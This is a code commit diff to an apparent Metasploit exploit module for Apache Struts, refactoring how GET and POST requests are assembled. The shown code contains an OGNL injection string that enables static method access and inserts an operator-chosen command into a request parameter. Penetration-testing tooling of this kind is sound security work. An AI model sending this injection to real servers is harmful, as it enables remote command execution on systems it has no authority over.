converted request params to hash merge operation

2013-05-30 15:36:01 +01:00 · 2013-05-30 15:36:01 +01:00 · 47524a0570
parent 51879ab9c7
commit 47524a0570
1 changed files with 7 additions and 14 deletions
--- a/modules/exploits/multi/http/struts_include_params.rb
+++ b/modules/exploits/multi/http/struts_include_params.rb
@ -79,23 +79,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
 		inject.gsub!(/CMD/,cmd)
 		uri = normalize_uri(target_uri.path)
-
+		req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }
+		
 		case datastore['HTTPMETHOD']
 			when 'POST'
-				resp = send_request_cgi({
-					'uri'     => uri,
-					'vars_post' => { datastore['PARAMETER'] => inject },
-					'version' => '1.1',
-					'method'  => 'POST'
-				})
+				req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject }})
 			when 'GET'
-				resp = send_request_cgi({
-					'uri' => uri,
-					'vars_get' => { datastore['PARAMETER'] => inject },
-					'version' => '1.1',
-					'method' => 'GET'
-				})
+				req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject }})
 		end
+
 # Display a nice "progress bar" instead of message spam
 		case @notify_flag
 		when 0
@ -106,7 +98,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		when 2
 			print_status("Payload upload complete")
 		end
-		return resp #Used for check function.
+
+		return send_request_cgi(req_hash) #Used for check function.
 	end

 	def exploit